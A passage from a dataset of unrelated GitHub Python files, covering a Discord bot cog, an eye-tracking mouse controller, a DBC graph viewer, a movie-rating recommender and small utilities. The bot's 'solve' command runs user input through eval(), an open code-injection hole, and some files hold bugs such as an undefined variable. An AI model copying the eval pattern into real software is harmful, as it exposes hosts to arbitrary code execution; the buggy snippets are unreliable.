cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows() # destroy all opened windows\n\nprint(\"\\n\\n***********Processing Done! 
Checkout './output' directory for results.***********\")\n","repo_name":"ChangyuYan/Forensic-Face-Warping","sub_path":"video_dlib_marker.py","file_name":"video_dlib_marker.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26081066441","text":"import discord\nfrom discord import Embed\nfrom discord.ext import commands\nfrom googlesearch import search as gsearch\n\n\nclass Misc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n \n @commands.command(aliases=[\"server\"])\n async def serverinfo(self, ctx):\n humanCount=len([m for m in ctx.guild.members if not m.bot])\n print(ctx.guild.members)\n print(humanCount)\n botCount=ctx.guild.member_count-humanCount\n owner=ctx.guild.owner\n icon=str(ctx.guild.icon_url)\n name=str(ctx.guild.name)\n text_channels=len(ctx.guild.text_channels)\n voice_channels = len(ctx.guild.voice_channels)\n role_count = len(ctx.guild.roles)\n created = ctx.guild.created_at.strftime(\"%m-%d-%Y %H:%M%p\")\n \n embed1=Embed(timestamp=ctx.message.created_at,color=ctx.author.color,title=name+\" Server Info\")\n embed1.set_thumbnail(url=icon)\n embed1.add_field(name=\"Human Count\",value=humanCount)\n embed1.add_field(name=\"Bot Count\",value=botCount)\n embed1.add_field(name=\"Owner\",value=owner)\n embed1.add_field(name=\"Text Channels\",value=text_channels)\n embed1.add_field(name=\"Voice Channels\",value=voice_channels)\n embed1.add_field(name=\"Role Count\",value=role_count)\n embed1.add_field(name=\"Created On\",value=created)\n await ctx.send(embed=embed1)\n @commands.command()\n async def search(self,ctx,results=10,*argv): # cog commands need self as the first parameter\n query=\" \".join(argv)\n if not query: # \" \".join() never returns None; an empty string means no query was given\n await ctx.send('You need to enter a query...')\n else:\n embed=discord.Embed(title='Results for '+query+':')\n results=gsearch(query,lang='en',num_results=results)\n for i in results:\n embed.add_field(name='Search Result:',value=i,inline=False)\n await ctx.send(embed=embed)\n @commands.command()\n async def solve(self,ctx,e):\n try:\n embed=discord.Embed(title=\"Answer:\",description=\"Your problem returned with the answer {}\".format(eval(e)))\n await ctx.send(embed=embed)\n except Exception:\n await ctx.send(\"Oh no! 
Something went wrong\")\n \n\n\n\n \n \n\n\n \n\ndef setup(bot):\n bot.add_cog(Misc(bot))\n","repo_name":"theRandom12/Omni","sub_path":"bot/cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38019332167","text":"import random\nimport time\nimport tracemalloc\n\ntracemalloc.start()\n\n\ndef main():\n\n gerador = random.Random()\n\n cont = 0\n for i in range(1005000):\n if cont < 9:\n print(f\"{gerador.randint(0, 999)},\", end=\"\")\n cont += 1\n else:\n print(f\"{gerador.randint(0, 999)} \")\n cont = 0\n\n\nif __name__ == \"__main__\":\n\n inicio = time.time()\n main()\n fim = time.time()\n tracemalloc.stop() # Para a medição de memória\n\n current, peak = tracemalloc.get_traced_memory()\n print(f\"Memória utilizada: {memory_stats[0] / (1024 * 1024)} MB\")\n print(f\"Pico de memória: {memory_stats[1] / (1024 * 1024)} MB\")\n tempo_execucao = (fim - inicio) * 1000\n print(f\"Tempo de execução: {tempo_execucao:.2f} milissegundos\")\n\n with open(\"NaoOrdenado.txt\", \"a\") as file:\n file.write('\\n')\n file.write(\n f\"Tempo de execução: {tempo_execucao:.2f} milissegundos, Pico de uso de memória: {peak / 10**6} MB\\n\")\n","repo_name":"akyla007/TopicosDois","sub_path":"Atividade1/NaoOrdenado.py","file_name":"NaoOrdenado.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32808920533","text":"# https://leetcode.com/explore/challenge/card/june-leetcoding-challenge/539/week-1-june-1st-june-7th/3351/\n\nfrom random import random\n\nclass Solution:\n\n def __init__(self, w: List[int]):\n self.cumsums = []\n cumsum = 0\n for n in w:\n cumsum += n\n self.cumsums.append(cumsum)\n\n def pickIndex(self) -> int:\n t = self.cumsums[-1] * random()\n for i, cumsum in enumerate(self.cumsums):\n if t < cumsum:\n return i\n\n \n# Your Solution object will be instantiated and called as such:\n# obj = Solution(w)\n# param_1 = obj.pickIndex()","repo_name":"rmodi6/scripts","sub_path":"practice/Leetcode/3351_random_pick_with_weight.py","file_name":"3351_random_pick_with_weight.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20328380455","text":"import logging\nfrom contextlib import contextmanager\n\n\ndef init_logger():\n logger = logging.getLogger()\n logger.addHandler(logging.StreamHandler())\n logger.setLevel(logging.INFO)\n\n\n@contextmanager\ndef pause(vmi):\n vmi.pause_vm()\n try:\n yield\n finally:\n vmi.resume_vm()\n","repo_name":"OA136/lib","sub_path":"python-libvmi/examples/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74881754809","text":"#! 
/usr/bin/env python3\n\nfrom typing import List\nfrom graphviz import Digraph\nimport cantools\nimport click\nimport pathlib\nimport os\nimport tempfile\n\ndef sort_messages_by_CAN_id(msgs: list):\n i = 0\n while i < len(msgs) - 1: # compare through the last adjacent pair (the original '- 2' bound skipped it)\n if msgs[i].frame_id > msgs[i + 1].frame_id:\n msgs[i], msgs[i + 1] = msgs[i + 1], msgs[i]\n i = 0\n i += 1\n return msgs\n\ndef messages_from_a_to_b(messages: cantools.db.Message,\n senders: List[str],\n receivers: List[str]):\n \"\"\"return all messages sent from any ecu_a to any ecu_b\"\"\"\n matching_messages = []\n msgs_to_search = [msg for msg in messages if any([sender in msg.senders for sender in senders])]\n for msg in msgs_to_search:\n for receiver in receivers:\n if any([receiver in sig.receivers for sig in msg.signals]):\n matching_messages.append(msg)\n return matching_messages\n\ndef to_hex_str(val: float):\n # zero-pad so every colour channel is exactly two hex digits\n return format(int(val * 255), '02x')\n\ndef color_str_for_msg(msg, min_id=0, max_id=0x7FF):\n \"\"\" makes lines representing higher priority (lower CAN ID) red \"\"\"\n fmt = \"#{red}00{blue}\"\n id_range = max_id - min_id\n if id_range:\n norm = (msg.frame_id - min_id) / id_range\n else:\n norm = 0.5\n\n # higher priority is more red\n out = fmt.format(red=to_hex_str(1-norm), blue=to_hex_str(norm))\n\n return out\n\ndef fmt_msg_name(msg):\n return f\"{msg.name}\\n{hex(msg.frame_id)} ({msg.frame_id})\"\n\ndef get_node_names(db: cantools.db.Database):\n return list(set([node.name for node in db.nodes]))\n\ndef get_edges(db: cantools.db.Database,\n senders: List[str]=[],\n receivers: List[str]=[]):\n\n # Sort the messages so they appear in order of increasing CAN ID\n sorted_messages = sort_messages_by_CAN_id(db.messages)\n\n edges = []\n for sender in senders:\n for receiver in receivers:\n for msg in messages_from_a_to_b(sorted_messages, [sender], [receiver]):\n edges.append((sender, receiver, msg))\n return edges\n\ndef dbcview(graph_name: str, edges, output_dir: str):\n \"\"\"\n display a graph of messages in a DBC\n save to PDF in output dir\n \"\"\"\n\n g = Digraph(name=graph_name, filename=graph_name.replace(' ', '_'))\n\n min_id = min([msg.frame_id for _, _, msg in edges])\n max_id = max([msg.frame_id for _, _, msg in edges])\n\n for sender, receiver, msg in edges:\n g.edge(tail_name=sender,\n head_name=receiver,\n label=fmt_msg_name(msg),\n color=color_str_for_msg(msg,\n min_id=min_id,\n max_id=max_id))\n \n g.view(cleanup=True, directory=output_dir)\n\ndef main(dbc_filename: str,\n nodes: List[str]=[],\n senders: List[str]=[],\n receivers: List[str]=[],\n ignore: List[str]=[],\n output_dir: str=\"\"):\n\n db = cantools.db.load_file(dbc_filename)\n\n all_nodes = get_node_names(db)\n if all_nodes == []:\n print(\"No nodes found in this DBC!\")\n return\n\n # Check for invalid node names\n nonexistent_nodes = [n for n in nodes + senders + receivers + ignore if n not in all_nodes]\n if nonexistent_nodes:\n print(f\"specified nodes: [{', '.join(nonexistent_nodes)}] not found in {dbc_filename}\")\n print(f\"nodes in this file: [{', '.join(get_node_names(db))}]\")\n return\n\n all_nodes = [n for n in all_nodes if n not in ignore]\n \n # If just a list of nodes, assume the user wants to see everything into/out of those nodes.\n if nodes:\n all_receivers = list(set(nodes + all_nodes))\n all_senders = all_receivers\n elif senders or receivers:\n all_receivers = receivers or all_nodes\n all_senders = senders or all_nodes\n else:\n all_receivers = all_nodes\n 
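# fall-through case: no filters were given, so every node acts as both a sender and a receiver\n 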
all_senders = all_nodes\n\n edges = get_edges(db, all_senders, all_receivers)\n if not edges:\n print(f\"No edges found between {all_senders} and {all_receivers}\")\n return # nothing to draw; min()/max() over an empty edge list would raise below\n\n graph_name = pathlib.Path(dbc_filename).stem\n if set(senders) != set(receivers):\n sender_expr = f\"from {' '.join(senders)}\" if senders else \"\"\n receiver_expr = f\"to {' '.join(receivers)}\" if receivers else \"\"\n if sender_expr or receiver_expr:\n graph_name += f\" {sender_expr} {receiver_expr}\"\n\n # mkdtemp keeps the directory alive; TemporaryDirectory().name would be deleted once the object is garbage collected\n output_dir = output_dir if os.path.isdir(output_dir) else tempfile.mkdtemp()\n\n dbcview(graph_name, edges, output_dir)\n\n@click.command(short_help=\"NODES - comma separated list of nodes, Eg MOT,CHG. Defaults to all\")\n@click.argument('filename', type=click.Path(exists=True))\n@click.argument('nodes', nargs=-1)\n@click.option('-s', '--senders', help=\"comma separated list of sending nodes\", default=\"\")\n@click.option('-r', '--receivers', help=\"comma separated list of receiving nodes\", default=\"\")\n@click.option('-i', '--ignore', help=\"comma separated list of nodes to ignore\", default=\"\")\n@click.option('-o', help=\"Output dir for PDF (defaults to tmp)\", default='', type=click.Path())\ndef cli(filename, nodes, senders, receivers, ignore, o):\n main(filename,\n list(nodes),\n senders.split(',') if senders else [],\n receivers.split(',') if receivers else [],\n ignore.split(',') if ignore else [],\n o)\n\nif __name__ == '__main__':\n cli()\n","repo_name":"driftregion/dbcview","sub_path":"dbcview.py","file_name":"dbcview.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"74069332728","text":"#!/usr/bin/env python3\nimport importlib\nimport pathlib\n\nfrom setuptools import find_packages, setup\n\nWORK_DIR = pathlib.Path(__file__).parent\n\n\ndef get_version():\n \"\"\"\n Read version\n :return: str\n \"\"\"\n return importlib.import_module(\"pytitle_cli\").__version__\n\n\ndef get_description():\n \"\"\"\n Read full description from 'README.md'\n :return: description\n :rtype: str\n \"\"\"\n with open(\"README.md\", \"r\", encoding=\"utf-8\") as f:\n return f.read()\n\n\nsetup(\n name=\"pytitle\",\n version=get_version(),\n packages=find_packages(\n exclude=(\n \"tests\",\n \"tests.*\",\n \"examples.*\",\n \"docs\",\n )\n ),\n url=\"https://github.com/sina-e/pytitle_cli\",\n license=\"MIT\",\n author=\"Sina Ebrahimi\",\n python_requires=\">=3.8\",\n author_email=\"ebrahimisina78@gmail.com\",\n description=\"Command line tool for editing and manipulating subtitles.\",\n long_description=get_description(),\n long_description_content_type=\"text/markdown\",\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Environment :: Console\",\n \"Intended Audience :: End Users/Desktop\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Topic :: Multimedia :: Video\",\n \"Topic :: Text Processing\",\n \"Typing :: Typed\",\n ],\n keywords=[\n \"subtitle\",\n \"subtitles\",\n \"subtitle-manipulation\",\n \"subtitle-manipulation-library\",\n \"subtitle-manipulation-python\",\n \"srt-subtitles\",\n \"vtt-subtitles\",\n \"ssa-subtitles\",\n \"ass-subtitles\",\n \"srt\",\n \"vtt\",\n \"ass\",\n \"ssa\",\n \"subtitle-edit\",\n \"subtitle-editor\",\n ],\n install_requires=[\n \"pytitle==0.1.6\",\n \"typer==0.4.1\",\n ],\n 
extras_require={},\n project_urls={\n \"Documentation\": \"https://pytitle-cli.readthedocs.io\",\n \"Source\": \"https://github.com/sina-e/pytitle-cli\",\n },\n include_package_data=False,\n)\n","repo_name":"pytitle/PyTitle-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70372941690","text":"'''\nPerforms the iteration for a Ax = b style problem.\nFor Jacobi, A = D(A)^-1*A and b = D(A)^-1*b\n'''\nimport numpy as np\n\ndef iterate(A, x, b):\n I = np.identity(np.size(x))\n x = np.dot((I - A), x) + b \n return(x)","repo_name":"Avd6977/me701","sub_path":"Richardson_Solver/iterate.py","file_name":"iterate.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73830965369","text":"import celery\n\nfrom mutagen import mp3 as mutagen_mp3\n\nfrom creator import models\n\n\n@celery.shared_task\ndef sort_chapters(episode_id):\n \"\"\"\n Recalculate and fill in the start and end times on all chapters\n \"\"\"\n episode = models.Episode.objects.get(\n id=episode_id,\n processed=False,\n )\n mp3_file = mutagen_mp3.MP3(episode.mp3.file)\n mp3_end_time = int(mp3_file.info.length * 1000)\n chapters = models.Chapter.objects.filter(\n episode=episode\n ).order_by(\"-start_time\")\n\n previous_start_time = None\n for chapter in chapters:\n if not chapter.end_time:\n if previous_start_time is None:\n chapter.end_time = mp3_end_time\n else:\n chapter.end_time = previous_start_time - 1\n chapter.save()\n previous_start_time = chapter.start_time\n","repo_name":"Apreche/frontrowcrew","sub_path":"creator/tasks/sort_chapters.py","file_name":"sort_chapters.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"75035080249","text":"import cv2\nfrom mc_controller import minecraft_controller\nfrom websurfing_controller import websurfing_controller\nimport keyboard\nimport pynput\nimport threading\n\nactive_mode = 'minecraft' # default to Minecraft mode; F4 toggles between web and Minecraft\n\ndef toggle_mode(e):\n global active_mode\n if active_mode == 'web':\n print(\"Switching to Minecraft Mode\")\n active_mode = 'minecraft'\n else:\n print(\"Switching to Web Surfing Mode\")\n active_mode = 'web'\n\nkeyboard.on_press_key(\"f4\", toggle_mode)\n\nimport time\nimport adhawkapi\nimport adhawkapi.frontend\nimport numpy as np\nimport math, os\n\nimport sys\nfrom PyQt6.QtWidgets import QApplication, QWidget\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import QPainter, QBrush, QColor\nimport pyautogui\n\n\npyautogui.FAILSAFE = False\nMOUSE = pynput.mouse.Controller()\n\n# get monitor res\nfrom screeninfo import get_monitors\n\nclass SmoothedValue:\n def __init__(self, alpha=0.5):\n self.alpha = alpha\n self.prev_value = None\n\n def get(self, value):\n if self.prev_value is None:\n self.prev_value = value\n smoothed_value = self.alpha * value + (1 - self.alpha) * self.prev_value\n self.prev_value = smoothed_value\n return smoothed_value\n\nclass SmoothEyeTracker:\n def __init__(self, wa, wb):\n self.a, self.b = wa, wb\n self.wp = (0,0)\n self.s = 80\n \n def next_pos(self, x, y):\n dx, dy = x - self.wp[0], y - self.wp[1]\n res = [self.wp[0] + dx / self.s, self.wp[1] + dy / self.s]\n # res[0] += dx / 10\n # res[1] += dy / 10\n\n self.wp = (x, y)\n return res\n\nclass SmallWindow(QWidget):\n 
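# frameless, always-on-top magenta window; the four corner instances give the camera bright magenta markers to detect\n 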
def __init__(self, title, x, y, w = 40, h = 40):\n super().__init__()\n\n # Set window title and position\n self.setWindowTitle(title)\n self.setGeometry(x, y, w, h) # x, y, width, height\n\n self.setWindowFlags(Qt.WindowType.FramelessWindowHint | Qt.WindowType.WindowStaysOnTopHint)\n self.setStyleSheet(\"background-color: rgba(255, 0, 255, 255);\")\n\n def keyPressEvent(self, event):\n # check if escape key\n if event.key() == Qt.Key.Key_Escape:\n QApplication.instance().quit() # Close the application\n\n\n# --------------------------------------------------\n\n\n\nframe = None # Declare global frame to be accessed in multiple functions\nxvec, yvec, zvec = 0.0, 0.0, 0.0 # Initialize gaze vector components to some default values\n\n\n\n# convert 15 inch to meters\nCSECTION = 15\nWIDTH = 13.4\nHEIGHT = 9.4\n\n# 1 inch = 0.0254 meters\nCOMPUTER_CSECTION = 0.0254 * CSECTION\n\nCOUNTER = 0\n\n# HSV_RANGE = [np.array((60, 0, 0)), np.array((85, 100, 100))] # green\nHSV_RANGE = [np.array((135, 100, 200)), np.array((155, 160, 255))] # magenta\nC_LIMIT = 15\n\n\n\nclass FrontendData:\n def __init__(self):\n global xvec, yvec # Declare these as global\n self._api = adhawkapi.frontend.FrontendApi(ble_device_name='ADHAWK MINDLINK-296')\n self._api.register_stream_handler(adhawkapi.PacketType.EYETRACKING_STREAM, self._handle_et_data)\n self._api.register_stream_handler(adhawkapi.PacketType.EVENTS, self._handle_events)\n self._api.start(tracker_connect_cb=self._handle_tracker_connect,\n tracker_disconnect_cb=self._handle_tracker_disconnect)\n\n def shutdown(self):\n self._api.shutdown()\n\n @staticmethod\n def _handle_et_data(et_data: adhawkapi.EyeTrackingStreamData):\n global COUNTER, xvec, yvec # Declare these as global\n COUNTER += 1\n if COUNTER % 10 != 0: return\n if et_data.gaze is not None:\n xvec, yvec, zvec, vergence = et_data.gaze\n # print(f'Gaze={xvec:.2f},y={yvec:.2f},z={zvec:.2f},vergence={vergence:.2f}')\n\n\n @staticmethod\n def _handle_events(event_type, timestamp, *args):\n if event_type == adhawkapi.Events.BLINK:\n duration = args[0]\n #print(f'Got blink: {timestamp} {duration}')\n\n def _handle_tracker_connect(self):\n print(\"Tracker connected\")\n self._api.set_et_stream_rate(60, callback=lambda *args: None)\n self._api.set_et_stream_control([\n adhawkapi.EyeTrackingStreamTypes.GAZE,\n adhawkapi.EyeTrackingStreamTypes.EYE_CENTER,\n adhawkapi.EyeTrackingStreamTypes.PUPIL_DIAMETER,\n adhawkapi.EyeTrackingStreamTypes.IMU_QUATERNION,\n ], True, callback=lambda *args: None)\n self._api.set_event_control(adhawkapi.EventControlBit.BLINK, 1, callback=lambda *args: None)\n self._api.set_event_control(adhawkapi.EventControlBit.EYE_CLOSE_OPEN, 1, callback=lambda *args: None)\n\n def _handle_tracker_disconnect(self):\n print(\"Tracker disconnected\")\n\ndef clamp(_min, _max, val):\n if val < _min:\n return _min\n if val > _max:\n return _max\n if math.isnan(val):\n return 0\n else:\n return val\n\ndef transform_gaze_to_screen_space(gaze_point, src_points, dst_points):\n src_points = np.array(src_points, dtype=np.float32)\n dst_points = np.array(dst_points, dtype=np.float32)\n \n M = cv2.getPerspectiveTransform(src_points, dst_points)\n \n # Ensure gaze_point is a Nx1x2 array\n gaze_points_array = np.array([gaze_point], dtype=np.float32).reshape(-1, 1, 2)\n \n transformed_points = cv2.perspectiveTransform(gaze_points_array, M)\n return tuple(map(int, transformed_points[0][0]))\n\n\n# HSV_RANGE = [np.array((60, 0, 0)), np.array((85, 100, 100))] # green\nHSV_RANGE = [np.array((135, 100, 200)), 
np.array((155, 160, 255))] # magenta\nC_LIMIT = 10\nEYE_SMOOTHER = SmoothEyeTracker(0.5, 0.2)\n\n\n# def run_gestures():\n# global minecraft_controller, active_mode, websurfing_controller\n# cap = cv2.VideoCapture(0)\n# while True:\n# ret, frame = cap.read()\n# if not ret:\n# print(\"Failed to grab frame\")\n# break\n\n# if active_mode == 'minecraft':\n# minecraft_controller(frame, active_mode)\n# elif active_mode == 'web':\n# websurfing_controller(frame, active_mode)\n\n# # Display the frame (you can add conditions to display based on the mode)\n# cv2.imshow(\"Controller\", frame)\n\n# if cv2.waitKey(1) & 0xFF == ord('q'):\n# break\n\n# cap.release()\n# cv2.destroyAllWindows()\n\n\n\n\ndef main():\n ''' App entrypoint '''\n global xvec, yvec # Declare these as global\n global minecraft_controller, active_mode, websurfing_controller\n\n frontend = FrontendData()\n # create an opencv camera instance\n cap = cv2.VideoCapture(0)\n\n\n # check if camera is opened\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n \n #screen_present = False\n try:\n \n # run the opencv code\n while True:\n # read frame from camera\n ret, frame = cap.read()\n\n if active_mode == 'minecraft':\n minecraft_controller(frame, active_mode)\n elif active_mode == 'web':\n websurfing_controller(frame, active_mode)\n\n # check if frame is read correctly\n if not ret:\n print(\"Can't receive frame (stream end?). Exiting ...\")\n break\n # Get dimensions\n h, w, c = frame.shape\n\n # For demonstration: create a point from gaze vector\n xc = (clamp(-3, 3, xvec) + 3) / 6 * w\n x_point = int(clamp(-10000, 10000, xc + (75 + xc/80)))\n y_point = h - int((clamp(-2, 2, yvec) + 2) / 4 * h)\n # -- \n # get hsv image\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n # filter out colours within a range\n mask = cv2.inRange(hsv, HSV_RANGE[0], HSV_RANGE[1])\n result = cv2.bitwise_and(frame, frame, mask=mask)\n # # convert result to black and white\n resultbw = cv2.cvtColor(result, cv2.COLOR_BGR2GRAY)\n\n\n coords = []\n # draw rectangles around each contour\n contours, hierarchy = cv2.findContours(resultbw, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n if w*h > C_LIMIT:\n coords.append((x, y))\n cv2.rectangle(result, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n # sort coords by x, then by y\n coords = sorted(coords, key=lambda x: (x[0]))\n # draw coords to result (lines)\n\n #screen_present = False # Reset the screen presence flag at the beginning of every iteration\n\n if len(coords) >= 4:\n topleft = max(coords[:2], key=lambda x: x[1])\n botleft = min(coords[:2], key=lambda x: x[1])\n topright = max(coords[2:], key=lambda x: x[1])\n botright = min(coords[2:], key=lambda x: x[1])\n # print(topleft, botleft, topright, botright, coords)\n cv2.line(frame, topleft, botleft, (0, 0, 255), 2)\n cv2.line(frame, topright, botright, (0, 0, 255), 2)\n cv2.line(frame, topleft, topright, (0, 0, 255), 2)\n cv2.line(frame, botleft, botright, (0, 0, 255), 2)\n\n #screen_present = True\n #---------\n\n # diagonal line\n cv2.line(result, botleft, topright, (0, 255, 0), 2)\n d_length = np.sqrt((botleft[0] - topright[0])**2 + (botleft[1] - topright[1])**2) # pixels\n scale_factor = COMPUTER_CSECTION / d_length # meters/pixels\n\n src_points = [topleft, botleft, topright, botright]\n dst_points = [(0, 0), (0, wmain.height), (wmain.width, 0), (wmain.width, wmain.height)]\n\n transformed_gaze_point = transform_gaze_to_screen_space((x_point, y_point), src_points, dst_points)\n\n # 
Draw a circle on the gaze point\n cv2.circle(frame, transformed_gaze_point, 5, (255, 255, 255), -1)\n\n # # print(xvec, yvec, zvec)\n # if math.isnan(xvec): xvec = 0\n # if math.isnan(yvec): yvec = 0\n\n # rx = int(xvec/3 * wm.width / 2) + 1920//2\n # ry = 1080//2 - int(yvec/1.8 * wm.height)\n\n # # what is width of the monitor?\n # mw = topright[0] - botleft[0]\n # mh = -botright[1] + topleft[1]\n # if mw < 0: mw = 1\n # if mh < 0: mh = 1\n\n # find center\n\n # assume max left = -2.5, max right = 2.5\n # max bot = -1.8, max top = 1.8\n # then remap inputs relative to scale\n # sx, sy = (xvec+2.5)/5, (yvec+1.8)/3.6\n # # finding the final coords\n # ex, ey = int(sx * mw + topleft[0]), int(sy * mh + topleft[1]) - mh//2\n # fx, fy = map(int, EYE_SMOOTHER.next_pos(ex, ey))\n\n # # ratio for real screen coords\n # rx, ry = fx / (mw if mw > 1 else 1), fy / (mh if mh > 1 else 1)\n # mag = math.sqrt(xvec**2 + yvec**2)\n # if mag <= 0: mag = 1\n # MS = 30\n # drx, dry = xvec / mag * MS, yvec / mag * MS\n \n # # move to screen coords\n # px, py = pyautogui.position()\n # MOUSE.move(drx, -dry)\n # print(xvec, yvec, drx, dry)\n\n # cv2.circle(frame, (fx, fy), 5, (0, 255, 0), -1)\n\n else:\n pass\n\n # cv2.imshow('result', result)\n cv2.imshow('frame', frame)\n\n # wait for key press\n if cv2.waitKey(1) == ord('q'):\n break\n\n except (KeyboardInterrupt, SystemExit) as e:\n print(e)\n frontend.shutdown()\n cap.release()\n cv2.destroyAllWindows()\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n except Exception as e:\n print(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n\n\n\n\nif __name__ == '__main__':\n wmain = get_monitors()[0]\n app = QApplication(sys.argv)\n \n # Create 4 small windows with different titles and positions\n window1 = SmallWindow(\"Window 1\", 0, 0)\n window2 = SmallWindow(\"Window 2\", 0, wmain.height-40)\n window3 = SmallWindow(\"Window 3\", wmain.width - 40, 0)\n window4 = SmallWindow(\"Window 4\", wmain.width - 40, wmain.height - 40)\n\n # Show all the windows\n window1.show()\n window2.show()\n window3.show()\n window4.show()\n main()\n\n\n\n\n\n","repo_name":"Xrizh/myEye","sub_path":"gesture.py","file_name":"gesture.py","file_ext":"py","file_size_in_byte":12765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17118774678","text":"# (1) when the argument is a numpy array, np.sum ultimately calls add.reduce to do the work.\n# The overhead of handling its argument and dispatching to add.reduce is why np.sum is slower.\n\nimport time\n\nimport numpy as np\nimport pandas\nimport buildUserWeightMatrix # import the helper module we compiled to C\n\nknn = 50\nstartTime = time.time()\n\ncolumnNames = ['movieID', 'userID', 'rating']\n\n# np.str/np.float were removed from NumPy; the builtins work as pandas dtypes\ntrainData = pandas.read_csv('TrainingRatings.txt', names=columnNames,\n\t\t\t\t\t\t\tdtype={'movieID': str, 'userID': str, 'rating': float})\n\n# gets first column for movie ids and second for user ids\nlistOfMovieIDs = trainData.movieID.tolist()\nlistOfUserIDs = trainData.userID.tolist()\n\n# unique movie IDs\n# pandas.unique is faster than numpy.unique and return_index= true by default\nuniqueListOfMovieIds = pandas.unique(listOfMovieIDs)\nnumberOfMovies = uniqueListOfMovieIds.size\ntempMovieEnum = 
dict(enumerate(uniqueListOfMovieIds))\nmovieEnum = {v: k for k, v in\n tempMovieEnum.items()} # invert tempMovieEnum because enumerate does not return it in key order\n\n# unique user IDs\nuniqueListOfUserIDs = pandas.unique(listOfUserIDs)\nnumberOfUsers = uniqueListOfUserIDs.size\ntempUserEnum = dict(enumerate(uniqueListOfUserIDs))\nuserEnum = {v: k for k, v in tempUserEnum.items()} # invert tempUserEnum because enumerate does not return it in key order\n\n# movie X user matrix; zeros rather than empty, since unrated cells must read as 0 (np.float was also removed from NumPy)\nmovieUserRatingMatrix = np.zeros(shape=(numberOfMovies, numberOfUsers), dtype=float)\n\n# user X user weight matrix (r)\nuserWeightMatrix = np.empty(shape=(numberOfUsers, numberOfUsers), dtype=float)\n\n############################################## FUNCTIONS DEFINITIONS #############################################\n\ndef buildMovieUserRatingMatrix( data ):\n\tfor index, row in data.iterrows():\n\t\tmovieIndex = movieEnum[row['movieID']]\n\t\tuserIndex = userEnum[row['userID']]\n\t\tmovieUserRatingMatrix[movieIndex][userIndex] = row['rating']\n\n\treturn\n\n# returns root mean square error value\ndef rmse(predictions, targets):\n\treturn np.sqrt(((predictions - targets) ** 2).mean())\n\n\ndef getMeanRating(ratings):\n\n\tratingArr = []\n\n\t# collect the actual nonzero ratings (the original looped over the indices by mistake)\n\tfor r in ratings:\n\t\tif r > 0:\n\t\t\tratingArr.append(r)\n\n\treturn np.asarray(ratingArr).mean()\n\n# Predict rating for user , for movie \ndef predictAndCompareUserRating(testData,weightMatrix,knn):\n\n\tpredictedMovies = np.zeros([len(testData)], dtype=[('movieID', '|S10'), ('userID', '|S10'), ('predictedRating', 'f4')])\n\tpredictionCounter = 0\n\trecommendations = np.zeros([numberOfMovies], dtype=[('movieID', '|S10'), ('userID', '|S10')])\n\trecommendationCounter = 0\n\tmaeValue = 0\n\n\trmsePredictions = []\n\trmseExpecteds = []\n\n\tfor index, row in testData.iterrows():\n\t\t# read a row from the test file\n\t\tmovieID = row['movieID']\n\t\tmovieIndex = movieEnum[movieID]\n\t\tuserID = row['userID']\n\t\tuserIndex = userEnum[userID]\n\t\texpectedRating = row['rating']\n\n\t\tmeanRatingOfActiveUser = getMeanRating(movieUserRatingMatrix[:,userIndex])\n\n\t\tnumerator = 0\n\t\tdenumerator = 0\n\n\t\tif userIndex < 100:\n\t\t\t# sort the weights against the other users in descending order and keep the knn most similar users\n\t\t\tsortedMostSimilarUsers = np.argsort(weightMatrix[userIndex][:])[::-1][:knn]\n\n\t\t\tfor similarUserIndex in range(0, knn):\n\t\t\t\t# get the index of the similar user\n\t\t\t\tsimilarUserIndex = sortedMostSimilarUsers[similarUserIndex]\n\n\t\t\t\t# mean of the ratings given by the similar user\n\t\t\t\tmeanRatingOfSimilarUser = getMeanRating(movieUserRatingMatrix[:, similarUserIndex])\n\t\t\t\t# the similar user's rating for the movie with this movieID\n\t\t\t\tsimilarUserRatingForMovie = movieUserRatingMatrix[movieIndex][similarUserIndex]\n\n\t\t\t\tnumerator += (similarUserRatingForMovie - meanRatingOfSimilarUser) * weightMatrix[userIndex][\n\t\t\t\t\tsimilarUserIndex]\n\t\t\t\tdenumerator += weightMatrix[userIndex][similarUserIndex]\n\n\t\t\tpredictedRating 